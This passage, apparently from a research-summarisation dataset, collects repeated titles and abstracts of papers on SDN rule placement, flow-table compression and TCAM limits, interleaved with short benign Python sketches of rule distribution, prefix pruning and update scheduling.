tables of network switches. However, fast SDN tables often cannot scale beyond a few hundred entries. This is because they typically include wildcards, and therefore are implemented using either expensive and power-hungry TCAMs, or complex and slow data structures. This paper presents the Palette distribution framework for decomposing large SDN tables into small ones and then distributing them across the network, while preserving the overall SDN policy semantics. Palette helps balance the sizes of the tables across the network, as well as reduce the total number of entries by sharing resources among different connections. It copes with two NP-hard optimization problems: Decomposing a large SDN table into equivalent subtables, and distributing the subtables such that each connection traverses each type of subtable at least once. 
To implement the Palette distribution framework, we introduce graph-theoretical formulations and algorithms, and show that they achieve close-to-optimal results in practice. --- paper_title: SwitchReduce: Reducing switch state and controller involvement in OpenFlow networks paper_content: OpenFlow is a popular network architecture where a logically centralized controller (the control plane) is physically decoupled from all forwarding switches (the data plane). Through this controller, the OpenFlow framework enables flow level granularity in switches thereby providing monitoring and control over each individual flow. Among other things, this architecture comes at the cost of placing significant stress on switch state size and overburdening the controller in various traffic engineering scenarios such as dynamic re-routing of flows. Storing a flow match rule and flow counter at every switch along a flow's path results in many thousands of entries per switch. Dynamic rerouting of a flow, either in an attempt to utilize less congested paths, or as a consequence of virtual machine migration, results in controller intervention at every switch along the old and new paths. In the absence of careful orchestration of flow storage and controller involvement, OpenFlow will be unable to scale to anticipated production data center sizes. In this context, we present SwitchReduce - a system to reduce switch state and controller involvement in OpenFlow networks. SwitchReduce is founded on the observation that the number of flow match rules at any switch should be no more than the set of unique processing actions it has to take on incoming flows. Additionally, the flow counters for every unique flow may be maintained at only one switch in the network. We have implemented SwitchReduce as a NOX controller application. Simulation results with real data center traffic traces reveal that SwitchReduce can reduce flow entries by up to approximately 49% on first hop switches, and up to 99.9% on interior switches, while reducing flow counters by 75% on average. --- paper_title: Optimizing the "one big switch" abstraction in software-defined networks paper_content: Software Defined Networks (SDNs) support diverse network policies by offering direct, network-wide control over how switches handle traffic. Unfortunately, many controller platforms force applications to grapple simultaneously with end-to-end connectivity constraints, routing policy, switch memory limits, and the hop-by-hop interactions between forwarding rules. We believe solutions to this complex problem should be factored in to three distinct parts: (1) high-level SDN applications should define their end-point connectivity policy on top of a "one big switch" abstraction; (2) a mid-level SDN infrastructure layer should decide on the hop-by-hop routing policy; and (3) a compiler should synthesize an effective set of forwarding rules that obey the user-defined policies and adhere to the resource constraints of the underlying hardware. In this paper, we define and implement our proposed architecture, present efficient rule-placement algorithms that distribute forwarding policies across general SDN networks while managing rule-space constraints, and show how to support dynamic, incremental update of policies. We evaluate the effectiveness of our algorithms analytically by providing complexity bounds on their running time and rule space, as well as empirically, using both synthetic benchmarks, and real-world firewall and routing policies. 
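The path-wise rule distribution discussed in the Palette and "one big switch" entries above can be made concrete with a small sketch. This is only an illustration of the consecutive-priority-block idea, not the algorithms from those papers; the Rule fields, the capacities, and the example policy are invented for the sketch, and each switch would additionally need a lowest-priority "forward to next hop" default rule that is not shown.

```python
from dataclasses import dataclass
from typing import List

@dataclass
class Rule:
    priority: int   # larger value = matched first
    match: str      # illustrative match expression
    action: str     # e.g. "drop" or "fwd"

def place_rules_on_path(rules: List[Rule], capacities: List[int]) -> List[List[Rule]]:
    """Split a prioritized, first-match rule list into consecutive priority
    blocks, one block per switch along the path, respecting per-switch table
    capacity. Keeping the blocks in priority order preserves first-match
    semantics: a packet hits its highest-priority matching rule at the
    earliest switch on the path that stores it."""
    ordered = sorted(rules, key=lambda r: -r.priority)
    placement, i = [], 0
    for cap in capacities:
        placement.append(ordered[i:i + cap])
        i += len(placement[-1])
    if i < len(ordered):
        raise ValueError("path does not offer enough aggregate rule space")
    return placement

if __name__ == "__main__":
    policy = [Rule(30, "10.0.1.0/24 dport=22", "drop"),
              Rule(20, "10.0.1.0/24", "fwd"),
              Rule(10, "*", "drop")]
    for hop, block in enumerate(place_rules_on_path(policy, [2, 2])):
        print("switch", hop, [r.match for r in block])
```

The greedy consecutive split is deliberately naive; balancing block sizes across switches, as Palette does, would require a more careful partitioning step.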
--- paper_title: Too Many SDN Rules? Compress Them with MINNIE paper_content: Software Defined Networking (SDN) is gaining momentum with the support of major manufacturers. While it brings flexibility in the management of flows within the data center fabric, this flexibility comes at the cost of smaller routing table capacities. In this paper, we investigate compression techniques to reduce the forwarding information base (FIB) of SDN switches. We validate our algorithm, called MINNIE, on a real testbed able to emulate a 20-switch fat-tree architecture. We demonstrate that even with a small number of clients, the limit in terms of number of rules is reached if no compression is performed, increasing the delay of all new incoming flows. MINNIE, on the other hand, drastically reduces the number of rules that need to be stored, with a limited impact on the packet loss rate. We also evaluate the actual switching and reconfiguration times and the delay introduced by the communications with the controller. --- paper_title: An Adaptable Rule Placement for Software-Defined Networks paper_content: There is a strong trend in networking to move towards Software-Defined Networks (SDN). SDNs enable easier network configuration through a separation between a centralized controller and a distributed data plane comprising a network of switches. The controller implements network policies through installing rules on switches. Recently the "Big Switch" abstraction [1] was proposed as a specification mechanism for high-level network behavior, i.e., the network policies. The network operating system or compiler can use this specification for placing rules on individual switches. However, this is constrained by the limited capacity of the Ternary Content Addressable Memories (TCAMs) used for rules in each switch. We propose an Integer Linear Programming (ILP) based solution for placing rules on switches for a given firewall policy while optimizing for the total number of rules and meeting the switch capacity constraints. Experimental results demonstrate that our approach is scalable to practical-sized networks. --- paper_title: Wildcard Compression of Inter-Domain Routing Tables for OpenFlow-Based Software-Defined Networking paper_content: In this paper we consider carrier networks using only OpenFlow switches instead of IP routers. Accommodating the full forwarding information base (FIB) of IP routers in the switches is difficult because the BGP routing tables in the default-free zone currently contain about 500,000 entries and switches have only limited capacity in their fast and expensive TCAM memory. The objective of this paper is the compression of the FIB in acceptable time to minimize the TCAM requirements of switches. The benchmark is simple prefix aggregation as it is common in IP networks where longest-prefix matching is applied. In contrast, OpenFlow-based switches can match general wildcard expressions with priorities. Starting from a minimum-size prefix-based FIB, we further compress that FIB by allowing general wildcard expressions, utilizing the Espresso heuristic that is commonly used for logic minimization. As the computation time of Espresso is challenging for large inputs, we provide means to trade computation time against compression efficiency. Our results show that today's FIB sizes can be reduced by 17%, saving up to 40,000 entries, and the compression time can be limited to 1-2 s while sacrificing only 1%-2% in compression ratio.
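As a deliberately simple illustration of the FIB-compression theme in the MINNIE, ORTC and wildcard-compression entries above, the sketch below applies one safe longest-prefix-match reduction: a prefix is dropped when its nearest covering prefix already forwards to the same next hop. This is far weaker than ORTC or Espresso-based wildcard minimization, and the table contents and next-hop labels are made-up examples.

```python
import ipaddress

def prune_fib(fib):
    """Drop prefixes whose next hop equals that of their nearest covering
    prefix in the table; under longest-prefix matching this leaves the
    forwarding behavior unchanged. `fib` maps prefix strings to next-hop
    labels (illustrative values only, all IPv4 here)."""
    nets = {ipaddress.ip_network(p): nh for p, nh in fib.items()}

    def nearest_covering(net):
        best = None
        for other in nets:
            if other != net and net.subnet_of(other):
                if best is None or other.prefixlen > best.prefixlen:
                    best = other
        return best

    kept = {}
    for net, nh in nets.items():
        parent = nearest_covering(net)
        if parent is not None and nets[parent] == nh:
            continue  # redundant: the covering prefix forwards the same way
        kept[str(net)] = nh
    return kept

if __name__ == "__main__":
    table = {"0.0.0.0/0": "A", "10.0.0.0/8": "B",
             "10.1.0.0/16": "B", "10.1.2.0/24": "C"}
    print(prune_fib(table))  # 10.1.0.0/16 is pruned; the other entries remain
```

The quadratic ancestor search is fine for a toy table; a production FIB optimizer would use a prefix trie and, as the papers above do, also merge siblings and exploit non-prefix wildcards.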
--- paper_title: OFFICER: A general optimization framework for OpenFlow rule allocation and endpoint policy enforcement paper_content: The Software-Defined Networking approach permits to realize new policies. In OpenFlow in particular, a controller decides on behalf of the switches which forwarding rules must be installed and where. However with this flexibility comes the challenge of the computation of a rule allocation matrix meeting both high-level policies and the network constraints such as memory or link capacity limitations. Nevertheless, in many situations (e.g., data-center networks), the exact path followed by packets does not severely impact performances as long as packets are delivered according to the endpoint policy. It is thus possible to deviate part of the traffic to alternative paths so to better use network resources without violating the endpoint policy. In this paper, we propose a linear optimization model of the rule allocation problem in resource constrained OpenFlow networks with relaxing routing policy. We show that the general problem is NP-hard and propose a polynomial time heuristic, called OFFICER, which aims to maximize the amount of carried traffic in under-provisioned networks. Our numerical evaluation on four different topologies shows that exploiting various paths allows to increase the amount of traffic supported by the network without significantly increasing the path length. --- paper_title: Fast incremental flow table aggregation in SDN paper_content: In OpenFlow-based SDN, flow tables are TCAM-hungry and commodity switches suffer from limited concrete flow table size. One method for coping with the limitations is to use aggregation schemes to reduce the number of flow entries required to represent the same forwarding semantics. Unfortunately, the aggregation retards table updates and lengthens the updating time. During which, the data plane is inconsistent with the control plane, forwarding errors such as Reachability Failures, Forwarding Loops, Traffic Isolation and Leakage are prone to occur. Since network updates take place frequently in practice, the aggregation scheme must be efficient enough. In this paper we propose offline FFTA (Fast Flow Table Aggregation) and its online improver iFFTA to shrink the flow table size and to provide practical fast updates. iFFTA is the first online non-prefix aggregation scheme. Extensive experiments demonstrate: (1) FFTA is about 200× faster than the previously published best non-prefix aggregation scheme without loss of compression ratio on offline aggregation; and (2) iFFTA achieves about 3× faster than FFTA on online update incorporations with a loss of an acceptable compression ratio per update. Thus the user could make a combination use of FFTA and iFFTA for table aggregations: call iFFTA usually and recall the efficient FFTA once the switch is running out of concrete flow table space. --- paper_title: Source flow: handling millions of flows on flow-based nodes paper_content: Flow-based networks such as OpenFlow-based networks have difficulty handling a large number of flows in a node due to the capacity limitation of search engine devices such as ternary content-addressable memory (TCAM). One typical solution of this problem would be to use MPLS-like tunneling, but this approach spoils the advantage of flow-by-flow path selection for load-balancing or QoS. We demonstrate a method named "Source Flow" that allows us to handle a huge amount of flows without changing the granularity of flows. 
By using our method, expensive and power consuming search engine devices can be removed from the core nodes, and the network can grow pretty scalable. In our demo, we construct a small network that consists of small number of OpenFlow switches, a single OpenFlow controller, and end-hosts. The hosts generate more than one million flows simultaneously and the flows are controlled on a per-flow-basis. All active flows are monitored and visualized on a user interface and the user interface allows audiences to confirm if our method is feasible and deployable. --- paper_title: Network traffic characteristics of data centers in the wild paper_content: Although there is tremendous interest in designing improved networks for data centers, very little is known about the network-level traffic characteristics of data centers today. In this paper, we conduct an empirical study of the network traffic in 10 data centers belonging to three different categories, including university, enterprise campus, and cloud data centers. Our definition of cloud data centers includes not only data centers employed by large online service providers offering Internet-facing applications but also data centers used to host data-intensive (MapReduce style) applications). We collect and analyze SNMP statistics, topology and packet-level traces. We examine the range of applications deployed in these data centers and their placement, the flow-level and packet-level transmission properties of these applications, and their impact on network and link utilizations, congestion and packet drops. We describe the implications of the observed traffic patterns for data center internal traffic engineering as well as for recently proposed architectures for data center networks. --- paper_title: Dynamic scheduling of network updates paper_content: We present Dionysus, a system for fast, consistent network updates in software-defined networks. Dionysus encodes as a graph the consistency-related dependencies among updates at individual switches, and it then dynamically schedules these updates based on runtime differences in the update speeds of different switches. This dynamic scheduling is the key to its speed; prior update methods are slow because they pre-determine a schedule, which does not adapt to runtime conditions. Testbed experiments and data-driven simulations show that Dionysus improves the median update speed by 53--88% in both wide area and data center networks compared to prior methods. --- paper_title: DomainFlow: practical flow management method using multiple flow tables in commodity switches paper_content: A scalable network with high bisection bandwidth and high availability requires efficient use of the multiple paths between pairs of end hosts. OpenFlow is an innovative technology and enables fine-grained, flow level control of Ethernet switching. However, the flow table structure defined by OpenFlow is not hardware friendly and the scalability is limited by the switch device. OpenFlow is also not sufficient for fast multipath failover. To overcome these limitations, we propose DomainFlow in which the network is split into sections and exact matches are used where possible to enable practical flow management using OpenFlow for commodity switches. We applied a prototype of DomainFlow to multipath flow management in the Virtual eXtensible LAN (VXLAN) overlay network environment. The total number of flow entries was reduced to 1/128 using currently available commodity switches, which was not possible before. 
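The consistent-update problem behind the Dionysus entry above reduces, in its simplest form, to ordering rule operations by their dependencies. The sketch below captures only that dependency-graph ordering; the operation names are hypothetical, and the actual Dionysus system additionally schedules dynamically around slow switches and resource constraints rather than fixing rounds in advance.

```python
def schedule_updates(ops, deps):
    """Group rule-update operations into rounds so that an operation is only
    issued after everything it depends on has completed. `deps[b]` is the set
    of operations that must finish before `b` may start. This is just the
    dependency-ordering core of consistent updates, not Dionysus itself."""
    remaining = {op: set(deps.get(op, ())) for op in ops}
    done, rounds = set(), []
    while remaining:
        ready = [op for op, pending in remaining.items() if pending <= done]
        if not ready:
            raise ValueError("cyclic dependencies: no consistent schedule exists")
        rounds.append(ready)
        for op in ready:
            done.add(op)
            del remaining[op]
    return rounds

if __name__ == "__main__":
    # Moving a flow from s1->s3 to s1->s2->s3 (hypothetical operation names):
    # install the new downstream rule first, then flip ingress, then clean up.
    ops = ["add_rule_s2", "flip_ingress_s1", "del_old_rule_s1"]
    deps = {"flip_ingress_s1": {"add_rule_s2"},
            "del_old_rule_s1": {"flip_ingress_s1"}}
    for i, batch in enumerate(schedule_updates(ops, deps), 1):
        print("round", i, batch)
```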
--- paper_title: SwitchReduce: Reducing switch state and controller involvement in OpenFlow networks paper_content: OpenFlow is a popular network architecture where a logically centralized controller (the control plane) is physically decoupled from all forwarding switches (the data plane). Through this controller, the OpenFlow framework enables flow level granularity in switches thereby providing monitoring and control over each individual flow. Among other things, this architecture comes at the cost of placing significant stress on switch state size and overburdening the controller in various traffic engineering scenarios such as dynamic re-routing of flows. Storing a flow match rule and flow counter at every switch along a flow's path results in many thousands of entries per switch. Dynamic rerouting of a flow, either in an attempt to utilize less congested paths, or as a consequence of virtual machine migration, results in controller intervention at every switch along the old and new paths. In the absence of careful orchestration of flow storage and controller involvement, OpenFlow will be unable to scale to anticipated production data center sizes. In this context, we present SwitchReduce - a system to reduce switch state and controller involvement in OpenFlow networks. SwitchReduce is founded on the observation that the number of flow match rules at any switch should be no more than the set of unique processing actions it has to take on incoming flows. Additionally, the flow counters for every unique flow may be maintained at only one switch in the network. We have implemented SwitchReduce as a NOX controller application. Simulation results with real data center traffic traces reveal that SwitchReduce can reduce flow entries by up to approximately 49% on first hop switches, and up to 99.9% on interior switches, while reducing flow counters by 75% on average. --- paper_title: DevoFlow: scaling flow management for high-performance networks paper_content: OpenFlow is a great concept, but its original design imposes excessive overheads. It can simplify network and traffic management in enterprise and data center environments, because it enables flow-level control over Ethernet switching and provides global visibility of the flows in the network. However, such fine-grained control and visibility comes with costs: the switch-implementation costs of involving the switch's control-plane too often and the distributed-system costs of involving the OpenFlow controller too frequently, both on flow setups and especially for statistics-gathering. ::: In this paper, we analyze these overheads, and show that OpenFlow's current design cannot meet the needs of high-performance networks. We design and evaluate DevoFlow, a modification of the OpenFlow model which gently breaks the coupling between control and global visibility, in a way that maintains a useful amount of visibility without imposing unnecessary costs. We evaluate DevoFlow through simulations, and find that it can load-balance data center traffic as well as fine-grained solutions, without as much overhead: DevoFlow uses 10--53 times fewer flow table entries at an average switch, and uses 10--42 times fewer control messages. --- paper_title: Shadow MACs: scalable label-switching for commodity ethernet paper_content: While SDN promises fine-grained, dynamic control of the network, in practice limited switch TCAM rule space restricts most forwarding to be coarse-grained. 
As an alternative, we demonstrate that using destination MAC addresses as opaque forwarding labels allows an SDN controller to leverage large MAC (L2) forwarding tables to manage a plethora of fine-grained paths. In this shadow MAC model, the SDN controller can install MAC rewrite rules at the network edge to guide traffic on to intelligently selected paths to balance traffic, avoid failed links, or route flows through middleboxes. Further, by decoupling the network edge from the core, we address many other problems with SDN, including consistent network updates, fast rerouting, and multipathing with end-to-end control. --- paper_title: OFFICER: A general optimization framework for OpenFlow rule allocation and endpoint policy enforcement paper_content: The Software-Defined Networking approach permits to realize new policies. In OpenFlow in particular, a controller decides on behalf of the switches which forwarding rules must be installed and where. However with this flexibility comes the challenge of the computation of a rule allocation matrix meeting both high-level policies and the network constraints such as memory or link capacity limitations. Nevertheless, in many situations (e.g., data-center networks), the exact path followed by packets does not severely impact performances as long as packets are delivered according to the endpoint policy. It is thus possible to deviate part of the traffic to alternative paths so to better use network resources without violating the endpoint policy. In this paper, we propose a linear optimization model of the rule allocation problem in resource constrained OpenFlow networks with relaxing routing policy. We show that the general problem is NP-hard and propose a polynomial time heuristic, called OFFICER, which aims to maximize the amount of carried traffic in under-provisioned networks. Our numerical evaluation on four different topologies shows that exploiting various paths allows to increase the amount of traffic supported by the network without significantly increasing the path length. --- paper_title: Optimizing rule placement in software-defined networks for energy-aware routing paper_content: Software-defined Networks (SDN), in particular OpenFlow, is a new networking paradigm enabling innovation through network programmability. Over past few years, many applications have been built using SDN such as server load balancing, virtual-machine migration, traffic engineering and access control. In this paper, we focus on using SDN for energy-aware routing (EAR). Since traffic load has a small influence on power consumption of routers, EAR allows to put unused links into sleep mode to save energy. SDN can collect traffic matrix and then computes routing solutions satisfying QoS while being minimal in energy consumption. However, prior works on EAR have assumed that the table of OpenFlow switch can hold an infinite number of rules. In practice, this assumption does not hold since the flow table is implemented with Ternary Content Addressable Memory (TCAM) which is expensive and power-hungry. In this paper, we propose an optimization method to minimize energy consumption for a backbone network while respecting capacity constraints on links and rule space constraints on routers. In details, we present an exact formulation using Integer Linear Program (ILP) and introduce efficient greedy heuristic algorithm. 
Based on simulations, we show that using this smart rule space allocation, it is possible to save almost as much power consumption as the classical EAR approach. --- paper_title: Palette: Distributing tables in software-defined networks paper_content: In software-defined networks (SDNs), the network controller first formulates abstract network-wide policies, and then implements them in the forwarding tables of network switches. However, fast SDN tables often cannot scale beyond a few hundred entries. This is because they typically include wildcards, and therefore are implemented using either expensive and power-hungry TCAMs, or complex and slow data structures. This paper presents the Palette distribution framework for decomposing large SDN tables into small ones and then distributing them across the network, while preserving the overall SDN policy semantics. Palette helps balance the sizes of the tables across the network, as well as reduce the total number of entries by sharing resources among different connections. It copes with two NP-hard optimization problems: Decomposing a large SDN table into equivalent subtables, and distributing the subtables such that each connection traverses each type of subtable at least once. To implement the Palette distribution framework, we introduce graph-theoretical formulations and algorithms, and show that they achieve close-to-optimal results in practice. --- paper_title: Optimizing the "one big switch" abstraction in software-defined networks paper_content: Software Defined Networks (SDNs) support diverse network policies by offering direct, network-wide control over how switches handle traffic. Unfortunately, many controller platforms force applications to grapple simultaneously with end-to-end connectivity constraints, routing policy, switch memory limits, and the hop-by-hop interactions between forwarding rules. We believe solutions to this complex problem should be factored in to three distinct parts: (1) high-level SDN applications should define their end-point connectivity policy on top of a "one big switch" abstraction; (2) a mid-level SDN infrastructure layer should decide on the hop-by-hop routing policy; and (3) a compiler should synthesize an effective set of forwarding rules that obey the user-defined policies and adhere to the resource constraints of the underlying hardware. In this paper, we define and implement our proposed architecture, present efficient rule-placement algorithms that distribute forwarding policies across general SDN networks while managing rule-space constraints, and show how to support dynamic, incremental update of policies. We evaluate the effectiveness of our algorithms analytically by providing complexity bounds on their running time and rule space, as well as empirically, using both synthetic benchmarks, and real-world firewall and routing policies. --- paper_title: An Adaptable Rule Placement for Software-Defined Networks paper_content: There is a strong trend in networking to move towards Software-Defined Networks (SDN). SDNs enable easier network configuration through a separation between a centralized controller and a distributed data plane comprising a network of switches. The controller implements network policies through installing rules on switches. Recently the "Big Switch" abstraction [1] was proposed as a specification mechanism for high-level network behavior, i.e., the network policies. The network operating system or compiler can use his specification for placing rules on individual switches. 
However, this is constrained by the limited capacity of the Ternary Content Addressable Memories (TCAMs) used for rules in each switch. We propose an Integer Linear Programming (ILP) based solution for placing rules on switches for a given firewall policy while optimizing for the total number of rules and meeting the switch capacity constraints. Experimental results demonstrate that our approach is scalable to practical sized networks. --- paper_title: OFFICER: A general optimization framework for OpenFlow rule allocation and endpoint policy enforcement paper_content: The Software-Defined Networking approach permits to realize new policies. In OpenFlow in particular, a controller decides on behalf of the switches which forwarding rules must be installed and where. However with this flexibility comes the challenge of the computation of a rule allocation matrix meeting both high-level policies and the network constraints such as memory or link capacity limitations. Nevertheless, in many situations (e.g., data-center networks), the exact path followed by packets does not severely impact performances as long as packets are delivered according to the endpoint policy. It is thus possible to deviate part of the traffic to alternative paths so to better use network resources without violating the endpoint policy. In this paper, we propose a linear optimization model of the rule allocation problem in resource constrained OpenFlow networks with relaxing routing policy. We show that the general problem is NP-hard and propose a polynomial time heuristic, called OFFICER, which aims to maximize the amount of carried traffic in under-provisioned networks. Our numerical evaluation on four different topologies shows that exploiting various paths allows to increase the amount of traffic supported by the network without significantly increasing the path length. --- paper_title: The joint optimization of rules allocation and traffic engineering in Software Defined Network paper_content: Software-Defined Network (SDN) is a promising network paradigm that separates the control plane and data plane in the network. It has shown great advantages in simplifying network management such that new functions can be easily supported without physical access to the network switches. However, Ternary Content Addressable Memory (TCAM), as a critical hardware storing rules for high-speed packet processing in SDN-enabled devices, can be supplied to each device with very limited quantity because it is expensive and energy-consuming. To efficiently use TCAM resources, we propose a rule multiplexing scheme, in which the same set of rules deployed on each node apply to the whole flow of a session going through but towards different paths. Based on this scheme, we study the rule placement problem with the objective of minimizing rule space occupation for multiple unicast sessions under QoS constraints.We formulate the optimization problem jointly considering routing engineering and rule placement under both existing and our rule multiplexing schemes. Finally, extensive simulations are conducted to show that our proposals significantly outperform existing solutions. --- paper_title: Infinite CacheFlow in software-defined networks paper_content: Software-Defined Networking (SDN) enables fine-grained policies for firewalls, load balancers, routers, traffic monitoring, and other functionality. 
While Ternary Content Addressable Memory (TCAM) enables OpenFlow switches to process packets at high speed based on multiple header fields, today's commodity switches support just thousands to tens of thousands of rules. To realize the potential of SDN on this hardware, we need efficient ways to support the abstraction of a switch with arbitrarily large rule tables. To do so, we define a hardware-software hybrid switch design that relies on rule caching to provide large rule tables at low cost. Unlike traditional caching solutions, we neither cache individual rules (to respect rule dependencies) nor compress rules (to preserve the per-rule traffic counts). Instead we ``splice'' long dependency chains to cache smaller groups of rules while preserving the semantics of the network policy. Our design satisfies four core criteria: (1) elasticity (combining the best of hardware and software switches), (2) transparency (faithfully supporting native OpenFlow semantics, including traffic counters), (3) fine-grained rule caching (placing popular rules in the TCAM, despite dependencies on less-popular rules), and (4) adaptability (to enable incremental changes to the rule caching as the policy changes). --- paper_title: Rule Optimization for Real-Time Query Service in Software-Defined Internet of Vehicles paper_content: Internet of Vehicles (IoV) has recently gained considerable attentions from both industry and research communities since the development of communication technology and smart city. However, a proprietary and closed way of operating hardwares in network equipments slows down the progress of new services deployment and extension in IoV. Moreover, the tightly coupled control and data planes in traditional networks significantly increase the complexity and cost of network management. By proposing a novel architecture, called Software-Defined Internet of Vehicles (SDIV), we adopt the software-defined network (SDN) architecture to address these problems by leveraging its separation of the control plane from the data plane and a uniform way to configure heterogeneous switches. However, the characteristics of IoV introduce the very challenges in rule installation due to the limited size of Flow Tables at OpenFlow-enabled switches which are the main component of SDN. It is necessary to build compact Flow Tables for the scalability of IoV. Accordingly, we develop a rule optimization approach for real-time query service in SDIV. Specifically, we separate wired data plane from wireless data plane and use multicast address in wireless data plane. Furthermore, we introduce a destination-driven model in wired data plane for reducing the number of rules at switches. Experiments show that our rule optimization strategy reduces the number of rules while keeping the performance of data transmission. --- paper_title: Optimizing rule placement in software-defined networks for energy-aware routing paper_content: Software-defined Networks (SDN), in particular OpenFlow, is a new networking paradigm enabling innovation through network programmability. Over past few years, many applications have been built using SDN such as server load balancing, virtual-machine migration, traffic engineering and access control. In this paper, we focus on using SDN for energy-aware routing (EAR). Since traffic load has a small influence on power consumption of routers, EAR allows to put unused links into sleep mode to save energy. 
SDN can collect traffic matrix and then computes routing solutions satisfying QoS while being minimal in energy consumption. However, prior works on EAR have assumed that the table of OpenFlow switch can hold an infinite number of rules. In practice, this assumption does not hold since the flow table is implemented with Ternary Content Addressable Memory (TCAM) which is expensive and power-hungry. In this paper, we propose an optimization method to minimize energy consumption for a backbone network while respecting capacity constraints on links and rule space constraints on routers. In details, we present an exact formulation using Integer Linear Program (ILP) and introduce efficient greedy heuristic algorithm. Based on simulations, we show that using this smart rule space allocation, it is possible to save almost as much power consumption as the classical EAR approach. --- paper_title: Palette: Distributing tables in software-defined networks paper_content: In software-defined networks (SDNs), the network controller first formulates abstract network-wide policies, and then implements them in the forwarding tables of network switches. However, fast SDN tables often cannot scale beyond a few hundred entries. This is because they typically include wildcards, and therefore are implemented using either expensive and power-hungry TCAMs, or complex and slow data structures. This paper presents the Palette distribution framework for decomposing large SDN tables into small ones and then distributing them across the network, while preserving the overall SDN policy semantics. Palette helps balance the sizes of the tables across the network, as well as reduce the total number of entries by sharing resources among different connections. It copes with two NP-hard optimization problems: Decomposing a large SDN table into equivalent subtables, and distributing the subtables such that each connection traverses each type of subtable at least once. To implement the Palette distribution framework, we introduce graph-theoretical formulations and algorithms, and show that they achieve close-to-optimal results in practice. --- paper_title: DomainFlow: practical flow management method using multiple flow tables in commodity switches paper_content: A scalable network with high bisection bandwidth and high availability requires efficient use of the multiple paths between pairs of end hosts. OpenFlow is an innovative technology and enables fine-grained, flow level control of Ethernet switching. However, the flow table structure defined by OpenFlow is not hardware friendly and the scalability is limited by the switch device. OpenFlow is also not sufficient for fast multipath failover. To overcome these limitations, we propose DomainFlow in which the network is split into sections and exact matches are used where possible to enable practical flow management using OpenFlow for commodity switches. We applied a prototype of DomainFlow to multipath flow management in the Virtual eXtensible LAN (VXLAN) overlay network environment. The total number of flow entries was reduced to 1/128 using currently available commodity switches, which was not possible before. --- paper_title: Heterogeneous Flow Table Distribution in Software-defined Networks paper_content: Recently, Software-defined Network (SDN) has become an important and popular technology which provides for the flexibility of developing new protocols and the policies of real networks. 
The controller in SDN translates network policies into rules which are installed in the flow tables of switches in the network (flow tables are usually stored in ternary content addressable memory, TCAM). However, TCAM has some critical disadvantages (e.g., high cost, power consumption and heat generation), so flow tables cannot scale beyond a few hundred entries. Therefore, switches may need to cache rules reactively (i.e., installing rules on demand). However, when cache misses happen, switches send packet-in messages to the controller and reactively cache the rules, which causes packet delays and requires large buffers. In this thesis, we propose a rule partition and allocation algorithm that distributes rules across network switches to improve performance. Our algorithm is not only applicable to switches with small TCAMs, but also guarantees semantic invariance (i.e., the global behavior of the network is unchanged). We implement our algorithm in a real-world SDN scenario, and the experimental results show that it clearly reduces TCAM usage. --- paper_title: SwitchReduce: Reducing switch state and controller involvement in OpenFlow networks paper_content: OpenFlow is a popular network architecture where a logically centralized controller (the control plane) is physically decoupled from all forwarding switches (the data plane). Through this controller, the OpenFlow framework enables flow level granularity in switches thereby providing monitoring and control over each individual flow. Among other things, this architecture comes at the cost of placing significant stress on switch state size and overburdening the controller in various traffic engineering scenarios such as dynamic re-routing of flows. Storing a flow match rule and flow counter at every switch along a flow's path results in many thousands of entries per switch. Dynamic rerouting of a flow, either in an attempt to utilize less congested paths, or as a consequence of virtual machine migration, results in controller intervention at every switch along the old and new paths. In the absence of careful orchestration of flow storage and controller involvement, OpenFlow will be unable to scale to anticipated production data center sizes. In this context, we present SwitchReduce - a system to reduce switch state and controller involvement in OpenFlow networks. SwitchReduce is founded on the observation that the number of flow match rules at any switch should be no more than the set of unique processing actions it has to take on incoming flows. Additionally, the flow counters for every unique flow may be maintained at only one switch in the network. We have implemented SwitchReduce as a NOX controller application. Simulation results with real data center traffic traces reveal that SwitchReduce can reduce flow entries by up to approximately 49% on first hop switches, and up to 99.9% on interior switches, while reducing flow counters by 75% on average. --- paper_title: vCRIB: virtualized rule management in the cloud paper_content: Cloud operators increasingly need many fine-grained rules to better control individual network flows for various management tasks. While previous approaches have advocated placing rules either on hypervisors or switches, we argue that future data centers would benefit from leveraging rule processing capabilities at both for better scalability and performance.
In this paper, we propose vCRIB, a virtualized Cloud Rule Information Base that allows operators to freely define different management policies without the need to consider underlying resource constraints. The challenge in our approach is the design of a vCRIB manager that automatically partitions and places rules at both hypervisors and switches to achieve a good trade-off between resource usage and performance. --- paper_title: Rule caching in SDN-enabled mobile access networks paper_content: An SDN enabled mobile access network is a future network with great potential to support scalable and flexible network applications. To support various network applications, the SDN-enabled mobile access network usually uses forwarding rules in SDN devices. With a limited rule space in existing SDN devices, a rule caching mechanism is an efficient way to improve network performance. In this article we propose SRCMN, which is a new caching structure to improve network performance with a limited rule space in the SDN-enabled mobile access network. We design a two-layer rule space in each SDN device, which is managed by the SDN controller. We also design a cache prefetching mechanism with the consideration of user mobility. By conducting extensive simulations, we demonstrate that our proposed structure and mechanism significantly outperform original rule space management under various network settings. --- paper_title: Optimizing the "one big switch" abstraction in software-defined networks paper_content: Software Defined Networks (SDNs) support diverse network policies by offering direct, network-wide control over how switches handle traffic. Unfortunately, many controller platforms force applications to grapple simultaneously with end-to-end connectivity constraints, routing policy, switch memory limits, and the hop-by-hop interactions between forwarding rules. We believe solutions to this complex problem should be factored in to three distinct parts: (1) high-level SDN applications should define their end-point connectivity policy on top of a "one big switch" abstraction; (2) a mid-level SDN infrastructure layer should decide on the hop-by-hop routing policy; and (3) a compiler should synthesize an effective set of forwarding rules that obey the user-defined policies and adhere to the resource constraints of the underlying hardware. In this paper, we define and implement our proposed architecture, present efficient rule-placement algorithms that distribute forwarding policies across general SDN networks while managing rule-space constraints, and show how to support dynamic, incremental update of policies. We evaluate the effectiveness of our algorithms analytically by providing complexity bounds on their running time and rule space, as well as empirically, using both synthetic benchmarks, and real-world firewall and routing policies. --- paper_title: Optimizing rules placement in OpenFlow networks: trading routing for better efficiency paper_content: The idea behind Software Defined Networking (SDN) is to conceive the network as one programmable entity rather than a set of devices to manually configure, and OpenFlow meets this objective. In OpenFlow, a centralized programmable controller installs rules onto switches to implement policies. However, this flexibility comes at the expense of extra overhead as the number of rules might exceed the memory capacity of switches, which raises the question of how to place most profitable rules on board. 
